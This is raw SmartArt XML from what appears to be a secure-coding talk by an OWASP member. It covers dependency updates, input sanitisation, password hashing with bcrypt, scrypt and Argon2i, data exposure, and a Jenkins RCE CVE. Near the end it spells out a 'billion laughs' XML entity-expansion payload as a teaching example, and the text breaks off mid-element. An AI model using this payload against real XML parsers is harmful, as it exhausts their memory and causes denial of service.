    </dgm:pt>
    <dgm:pt modelId="{8E99CB5D-58D2-450F-BB43-A491510013EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>CVE-2015-8103 Remote Code Execution vuln in Jenkins</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A9BB072-68F9-4EBC-ACA2-54E24DFDE691}" type="parTrans" cxnId="{EC5B1B94-51A4-4624-8438-BE4A24ED7956}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C30AD27-9BAA-4F40-A295-8094DAFE0D1B}" type="sibTrans" cxnId="{EC5B1B94-51A4-4624-8438-BE4A24ED7956}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" type="pres">
      <dgm:prSet presAssocID="{F86FF4A6-B83E-442E-B47F-2C09749D9FF3}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{08741920-AD1B-4FED-ABAA-3FB5EA4CA79B}" type="pres">
      <dgm:prSet presAssocID="{09A1AF4C-35E9-4DF8-A8CC-9157FFBD39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AC3F071-E27A-4186-905D-82F0280756AE}" type="pres">
      <dgm:prSet presAssocID="{08F43F0A-6029-4BCA-A096-FCF6ADCF1C33}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8FB0942E-0A9B-4DCB-A096-2BD289AC5651}" type="pres">
      <dgm:prSet presAssocID="{10CE7486-F473-4A7B-B6D4-923C3600B20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08C7E3-526C-4943-A1A3-3216D1BC1C82}" type="pres">
      <dgm:prSet presAssocID="{C48908B1-C198-422E-B09E-19008122F5C3}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CC73229A-C07C-4B1F-8FA2-26ADB5BB1291}" type="pres">
      <dgm:prSet presAssocID="{2CB44DEB-D2D1-4985-AE12-2BA7A2252E3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FB9AB42-BC19-4148-B37D-00154D7BD348}" type="pres">
      <dgm:prSet presAssocID="{BF75C58D-1579-4571-A6EB-D5A3105B07B9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{984A1154-510F-480D-98B7-AB5F082DDD0E}" type="pres">
      <dgm:prSet presAssocID="{A13F4ED5-ADB8-4A2A-83B8-F87DA47961C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F8F973-2D86-4C38-824C-2B7225ED14D0}" type="pres">
      <dgm:prSet presAssocID="{50F1D0BE-E58F-405E-9783-3A232ACDC388}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27697848-FB03-49A2-BCF5-9ABC25AB7BE1}" type="pres">
      <dgm:prSet presAssocID="{8E99CB5D-58D2-450F-BB43-A491510013E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82D01C-ED69-43CD-BEC9-BC42E78784DE}" srcId="{F86FF4A6-B83E-442E-B47F-2C09749D9FF3}" destId="{10CE7486-F473-4A7B-B6D4-923C3600B20D}" srcOrd="1" destOrd="0" parTransId="{507E1178-6A4C-4063-8AEB-AC5A55B60955}" sibTransId="{C48908B1-C198-422E-B09E-19008122F5C3}"/>
    <dgm:cxn modelId="{1B647333-3271-45AE-BCC3-060CB18F2305}" type="presOf" srcId="{F86FF4A6-B83E-442E-B47F-2C09749D9FF3}" destId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{355B8090-26FD-4063-92A5-F0D48C8C0F44}" type="presOf" srcId="{A13F4ED5-ADB8-4A2A-83B8-F87DA47961C6}" destId="{984A1154-510F-480D-98B7-AB5F082DDD0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EC5B1B94-51A4-4624-8438-BE4A24ED7956}" srcId="{F86FF4A6-B83E-442E-B47F-2C09749D9FF3}" destId="{8E99CB5D-58D2-450F-BB43-A491510013EA}" srcOrd="4" destOrd="0" parTransId="{0A9BB072-68F9-4EBC-ACA2-54E24DFDE691}" sibTransId="{9C30AD27-9BAA-4F40-A295-8094DAFE0D1B}"/>
    <dgm:cxn modelId="{AE782E97-2284-46DC-9E4D-8142B4CDF4AA}" type="presOf" srcId="{2CB44DEB-D2D1-4985-AE12-2BA7A2252E34}" destId="{CC73229A-C07C-4B1F-8FA2-26ADB5BB1291}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A4063EAF-DA48-4435-A8A4-1F18E0905B16}" type="presOf" srcId="{09A1AF4C-35E9-4DF8-A8CC-9157FFBD3938}" destId="{08741920-AD1B-4FED-ABAA-3FB5EA4CA79B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F3BACBBE-08DF-492F-B9A4-F7BE7AA596DA}" srcId="{F86FF4A6-B83E-442E-B47F-2C09749D9FF3}" destId="{2CB44DEB-D2D1-4985-AE12-2BA7A2252E34}" srcOrd="2" destOrd="0" parTransId="{9C4D396D-E2F1-4B07-B16A-12E55C5EF21F}" sibTransId="{BF75C58D-1579-4571-A6EB-D5A3105B07B9}"/>
    <dgm:cxn modelId="{B1B8D3C3-8D12-46EB-B09B-4D17697FBDB9}" srcId="{F86FF4A6-B83E-442E-B47F-2C09749D9FF3}" destId="{A13F4ED5-ADB8-4A2A-83B8-F87DA47961C6}" srcOrd="3" destOrd="0" parTransId="{4A7838C0-36BA-410C-A506-82E26B1894BF}" sibTransId="{50F1D0BE-E58F-405E-9783-3A232ACDC388}"/>
    <dgm:cxn modelId="{DFF457D4-AC13-4237-8A77-6ADD13006475}" type="presOf" srcId="{8E99CB5D-58D2-450F-BB43-A491510013EA}" destId="{27697848-FB03-49A2-BCF5-9ABC25AB7BE1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{34E40FDD-FC51-4597-B210-EC1FCE5B424A}" type="presOf" srcId="{10CE7486-F473-4A7B-B6D4-923C3600B20D}" destId="{8FB0942E-0A9B-4DCB-A096-2BD289AC5651}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B9AAC5E1-139B-4B48-9601-75B8CC22DF39}" srcId="{F86FF4A6-B83E-442E-B47F-2C09749D9FF3}" destId="{09A1AF4C-35E9-4DF8-A8CC-9157FFBD3938}" srcOrd="0" destOrd="0" parTransId="{7EDEB407-10A5-4D47-8615-C553B8791C47}" sibTransId="{08F43F0A-6029-4BCA-A096-FCF6ADCF1C33}"/>
    <dgm:cxn modelId="{87FB3128-03A6-4A91-BFE2-241A8995193D}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{08741920-AD1B-4FED-ABAA-3FB5EA4CA79B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7FAC936E-2C65-4295-9CCD-EFDD5BB0813A}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{9AC3F071-E27A-4186-905D-82F0280756AE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9C36A499-DF8A-4245-8EFF-D9AFC9CB6033}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{8FB0942E-0A9B-4DCB-A096-2BD289AC5651}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2C76BAAE-07AE-4B6B-A797-1D61EB098ED8}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{C408C7E3-526C-4943-A1A3-3216D1BC1C82}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{535F215C-6A6E-45E3-966A-BDAF0EF1AE78}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{CC73229A-C07C-4B1F-8FA2-26ADB5BB1291}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B9F07B22-C1FC-4EDC-AAD3-DABFDDBA4122}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{EFB9AB42-BC19-4148-B37D-00154D7BD348}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{270DAF0A-6080-4A9E-AA39-17F9475E155B}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{984A1154-510F-480D-98B7-AB5F082DDD0E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AE349797-6182-4419-9066-C4684B6A0F3B}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{B6F8F973-2D86-4C38-824C-2B7225ED14D0}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{381D2365-C604-45C6-ACC8-30654C188CB1}" type="presParOf" srcId="{6B27E31E-7AB7-4574-893A-DCAE982A8EAA}" destId="{27697848-FB03-49A2-BCF5-9ABC25AB7BE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C829E-54D4-4F0F-A565-E025CFA72C52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4038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Aaron K. Clark</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17563" y="57951"/>
        <a:ext cx="4797677" cy="324648"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6BDACCC1-C286-48D0-B022-C2CC6F237E2C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="44336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Made the Handle in 1990s (Dial-up BBS Days)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17563" y="460926"/>
        <a:ext cx="4797677" cy="324648"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A2B9B41C-1792-48BA-A8E7-6E3B8B1DB65B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="84633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Crypto == Cryptography</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17563" y="863901"/>
        <a:ext cx="4797677" cy="324648"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16314E31-17AE-4656-853C-44E913A31246}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="124931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Jones == Indiana Jones (Don’t judge, I was a pre-teen)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17563" y="1266876"/>
        <a:ext cx="4797677" cy="324648"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7D496B87-80B3-4087-B056-4202840F8306}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="165228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Now a Graduate Student @ RIT &amp; WGU</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17563" y="1669851"/>
        <a:ext cx="4797677" cy="324648"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{640148DE-28A9-440D-BB30-757029A6B968}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="205526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cryptojones@owasp.org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17563" y="2072826"/>
        <a:ext cx="4797677" cy="324648"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ED65AB4D-BF84-49AE-B20A-61C312E93487}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="245823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linkedin.com/in/aaronkclark</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17563" y="2475801"/>
        <a:ext cx="4797677" cy="324648"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C1F409D2-624E-448C-8D64-B09E8214021E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2861213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twitter.com/aaronkclark</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17563" y="2878776"/>
        <a:ext cx="4797677" cy="324648"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC2EC0F8-4075-40C6-AB0E-F0A40ECE53B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3264188"/>
          <a:ext cx="4832803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github.com/CryptoJones (&lt;- Slide Deck Here)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17563" y="3281751"/>
        <a:ext cx="4797677" cy="3246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CF47C-DAAA-41DE-A85A-694EC38066A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9B155-8684-415A-9D51-BD2F2E611DC0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Update your f***</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5000" kern="1200" dirty="0" err="1"/>
            <a:t>ing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5000" kern="1200" dirty="0"/>
            <a:t> dependencies</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="10515600" cy="1087834"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F7325A5-F37F-4BEE-8C4F-EB27D295CE5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12C10-51BE-4963-AADD-5D692B90532D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Retire.JS</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1087834"/>
        <a:ext cx="10515600" cy="1087834"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C9F2F6B-774E-4DE0-8F2C-EB5F0670E00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A8D88-9EC0-4943-8FF3-35E94225982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Retire.NET</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2175669"/>
        <a:ext cx="10515600" cy="1087834"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EA6D6451-906F-4C38-AA77-11491D2AED3C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B7546-52DA-4FC3-B64B-6DEB5DA4EC19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Synk</a:t>
          </a:r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E92E4-2F0B-48DF-A576-B9243DB5FFB3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Sanitize your inputs</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="38638" y="45464"/>
        <a:ext cx="10438324" cy="714229"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6BD07CAA-D623-4A1C-84D3-9DB171BBB3FA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Input Validation (Client-Side)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="38638" y="932009"/>
        <a:ext cx="10438324" cy="714229"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{336373FA-96DC-45CF-96D9-9B7ED5B5108D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Sanitize your inputs</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="38638" y="1818554"/>
        <a:ext cx="10438324" cy="714229"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{95D10609-E99B-420D-86D9-12B6B2EB2665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Parameterization (Server-Side)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="38638" y="2705099"/>
        <a:ext cx="10438324" cy="714229"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0DDA7A62-3E2C-4F2F-A0B5-01B80F66621D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Sanitize your inputs</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="38638" y="3591644"/>
        <a:ext cx="10438324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779D1-18B4-44B6-92E4-F29E33900EA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="77914"/>
          <a:ext cx="10515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Store passwords Correctly!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31028" y="108942"/>
        <a:ext cx="10453544" cy="573546"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CDDD8533-5944-41B1-B1AD-4183A3510C23}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="759597"/>
          <a:ext cx="10515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Simple Hashes are not SAFE, </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31028" y="790625"/>
        <a:ext cx="10453544" cy="573546"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{08DD84D6-3B7C-44A3-AA30-01999F817B6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1441279"/>
          <a:ext cx="10515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Complex hashes ALONE are only slightly safer.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31028" y="1472307"/>
        <a:ext cx="10453544" cy="573546"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6F023892-9CD9-4B06-A38F-B0F44B684DE8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2122962"/>
          <a:ext cx="10515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DO IT RIGHT: Bcrypt – time cost, Scrypt – time cost + memory cost, Argon2i – time cost + memory cost + parallelism degree</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31028" y="2153990"/>
        <a:ext cx="10453544" cy="573546"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{91177DA7-9738-4365-91FE-1D0043238E8B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2804644"/>
          <a:ext cx="10515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the work factor and memory cost as high as possible</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1600" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200"/>
            <a:t>(regardless of what you think you’ll never refactor)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31028" y="2835672"/>
        <a:ext cx="10453544" cy="573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20F58-BDB2-460D-A6F9-E93D7041A391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9B7CC-C1E7-4187-8D17-F2BB0E1C5665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2DF27-280B-447C-B43C-5AFC1C18990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Which data is sensitive? </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1834517" y="469890"/>
        <a:ext cx="3148942" cy="1335915"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B5F164E8-A3ED-40AD-B4CB-492FBBE28CDD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E29F1-4FB5-47FD-8FB1-AA94CDF9343C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121B5-E309-4FC5-A1E6-E12DBAC6E20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(ALL OF IT!)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7154322" y="469890"/>
        <a:ext cx="3148942" cy="1335915"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A0B888F6-5ADE-4950-AB0B-4F8213ABCE78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BB5F4-68C5-4426-931D-E08A337612CB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7B7B2-BD78-49C5-8A7B-92353BCA8FF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shouldn't expose ANYTHING regardless of data's classification type.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1834517" y="2545532"/>
        <a:ext cx="3148942" cy="1335915"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3E76CF09-612A-439D-A40A-834D62BC5737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10A28-0DDB-4774-BCD6-68474ABDE7E5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D53CD-B2B1-47E8-BD3B-884110030AB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Only authenticated users should be able to see any data</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7154322" y="2545532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79C6F-27DA-4625-8846-055059BF3C99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="587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&lt;!DOCTYPE lolz [</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="17586"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{15DA23EA-70AF-458E-AAFA-BDDA9F953408}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="27452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&lt;!ENTITY lol "lol"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="286236"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9DAF7B49-D717-42B7-B209-37DAE2425516}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="54317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&lt;!ELEMENT lolz (#PCDATA)&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="554886"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3649FAD0-FD69-4445-8E67-1DBEB4A9ECEC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="81182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&lt;!ENTITY lol1 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="823536"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3D86E316-8D3D-4644-A962-516864F86AE1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="108047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&lt;!ENTITY lol2 "&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="1092186"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7894FFDC-D942-4DED-BFB0-7EBD51F6FDA5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="134912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&lt;!ENTITY lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="1360836"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{05718E37-9BDF-466D-9489-381AAE3C8832}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="161777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&lt;!ENTITY lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="1629486"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{51077FA1-665B-4339-8C66-CBFAB390157B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="188642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&lt;!ENTITY lol5 "&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="1898136"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EEC570B9-BE84-4120-A1C4-388ECF2F71A1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="215507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&lt;!ENTITY lol6 "&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="2166786"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8D0EE013-E72D-4046-A913-E42E5B2FA7CA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="242372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&lt;!ENTITY lol7 "&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="2435436"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E1EE7493-E273-49F9-A020-87E33121932A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="269237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&lt;!ENTITY lol8 "&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="2704086"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C5BA18E7-16A0-48BB-B30B-3C9FF8DE94F9}">
      <dsp:nvSpPr>
